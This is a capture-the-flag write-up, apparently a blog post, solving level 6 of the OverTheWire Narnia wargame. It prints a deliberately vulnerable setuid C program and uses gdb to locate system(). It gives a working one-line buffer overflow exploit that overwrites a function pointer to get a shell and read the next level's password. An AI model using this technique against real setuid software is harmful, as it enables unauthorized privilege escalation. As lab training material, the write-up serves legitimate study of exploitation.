# Narnia wargame: Level 6


# ssh narnia6@narnia.labs.overthewire.org
narnia6@narnia.labs.overthewire.org's password:6e65657a6f6361656e67

narnia6@melissa$ file /narnia/narnia6
/narnia/narnia6: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia6@melissa$ cat /narnia/narnia6.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

int main(int argc, char *argv[]){
        char b1[8], b2[8];
        int  (*fp)(char *)=(int(*)(char *))&puts, i;

        if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }

        /* clear environ */
        for(i=0; environ[i] != NULL; i++)
                memset(environ[i], '\0', strlen(environ[i]));
        /* clear argz    */
        for(i=3; argv[i] != NULL; i++)
                memset(argv[i], '\0', strlen(argv[i]));

        strcpy(b1,argv[1]);
        strcpy(b2,argv[2]);
        if(((unsigned long)fp & 0xff000000) == 0xff000000)
                exit(-1);
        fp(b1);

        exit(1);
}
narnia6@melissa$ gdb -q /narnia/narnia6
(gdb) run a b
Starting program: /narnia/narnia6 a b
a

Program exited with code 01.
(gdb) break system
Breakpoint 1 at 0xf7eaf260
(gdb) quit
narnia6@melissa$ /narnia/narnia6 `perl -e 'print "a"x8 . "\x60\xf2\xea\xf7"'` `perl -e 'print "a"x8 . "/bin/sh"'`
$ /usr/bin/whoami
narnia7
$ /bin/cat /etc/narnia_pass/narnia7
61686b69617a69706875

No comments: